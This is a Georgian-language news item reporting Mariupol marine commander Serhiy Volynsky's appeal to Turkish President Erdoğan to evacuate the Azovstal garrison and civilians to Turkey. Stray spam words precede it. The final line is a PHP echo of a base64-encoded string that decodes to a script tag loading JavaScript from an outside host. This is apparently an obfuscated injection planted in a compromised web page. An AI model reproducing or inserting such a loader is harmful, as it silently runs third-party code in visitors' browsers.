tube
ავერსი jaluzi
უკრაინის ქალაქ მარიუპოლში ალყაში მყოფი 36-ე საზღვაო ქვეითი ბრიგადის მეთაური სერჰი ვოლინსკი (ვოლინა) თურქეთის პრეზიდენტს რეჯეფ თაიფ ერდოღანს მიმართავს და სთხოვს გამოიყენოს "ექსტრაქციის" პროცედურა და ალყაში მყოფი სამხედრო და სამოქალაქო პირები თურქეთში გაიყვანოს. ამის შესახებ ინფორმაციას თურქული მედია ავრცელებს.
 
ვოლინა სთხოვს თურქეთის პრეზიდენტს და თურქეთის მოსახლეობას, რომ გააკეთონ ყველაფერი, რათა საკუთარი უსაფრთხოების გარანტიით გაიყვანონ მარიუპოლის გარნიზონი "აზოვსტალიდან" თურქეთის ტერიტორიაზე.
 
"პატივცემულო ბატონო პრეზიდენტო რეჯეფ თაიფ ერდოღან თქვენ მოგმართავთ საზღვაო ქვეითთა მაიორი, სერჰი ვოლინსკი, ამჟამად ვასრულებ მეთაურის მოვალეობას 36-ე საზღვაო ქვეითი ბრიგადისა, რომელიც მარიუპოლის გარნიზონში იმყოფება და ალყაში მოქცეული 65 დღე ღამის განმავლობაში იბრძვის. ჩვენთან ერთად იმყოფება 600 სამხედრო მოსამსახურე, რომლებსაც სხვადასხვა სახის ჭრილობა აქვთ და საჭიროებენ დახმარებას. ჩვენთან ერთად ობიექტზე უსაფრთხოებას ეძებს ასობით სამოქალაქო პირი და ათობით ბავშვი. მათ შორის ყველაზე უმცროსი 4 წლისაა", ჩვენ თქვენი დახმარების დიდი იმედი გვაქვს - წერს მიმართვაში უკრაინის 36-ე საზღვაო ქვეითი ბრიგადის მეთაური.
 
1253
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");